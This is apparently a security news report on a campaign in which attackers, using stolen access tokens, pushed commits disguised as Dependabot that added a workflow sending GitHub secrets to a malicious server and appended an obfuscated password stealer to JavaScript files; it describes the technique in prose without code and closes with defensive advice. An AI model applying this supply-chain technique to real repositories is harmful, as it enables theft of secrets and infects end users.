In July, a security anomaly surfaced when atypical commits, disguised as Dependabot contributions, were detected in numerous GitHub repositories. On closer examination, these commits were found to harbor malicious code, raising serious concerns within the developer community.
Diving into Details
- Threat actors meticulously fabricated commit messages to mimic Dependabot's automated contributions to mask the malevolent activities they were indulging in.
- This stealth approach was shockingly effective, as most developers trust Dependabot's commits without scrutiny. The perpetrators misappropriated victims’ GitHub accounts to make these malicious code contributions.
- These codes were crafted to divert the GitHub project's secrets to an attacker-controlled C2 server. Additionally, JavaScript files within the targeted project were tampered with, embedding them with a password-stealer malware, which posed a direct threat to end-users.
Modus Operandi
- Between July 8 and July 11, an unidentified threat actor began compromising a multitude of GitHub repositories, affecting both public and private sectors, with a significant number of victims originating from Indonesia.
- The attackers skillfully manipulated commit messages, leading developers to believe that the real Dependabot had made these contributions.
- On delving deeper into these repositories, certain consistent patterns emerged.
- A new GitHub Action file titled “hook.yml” was recurrently noticed. This new file, upon every push event, would send GitHub secrets to a specific malicious URL. Furthermore, all existing “*.js” project files were appended with an obfuscated line, posing additional threats.
Conclusion
Understanding this breach's gravity, a few affected victims were reached out to, shedding light on the fact that these unauthorized accesses were made using compromised personal access tokens. This activity serves as a stern reminder of the perils lurking in the digital world, emphasizing the need for vigilance even when sourcing code from trusted platforms like GitHub. For bolstering security, it's advisable to shift to GitHub's fine-grained personal access tokens, regularly review commit changes, and implement 2FA.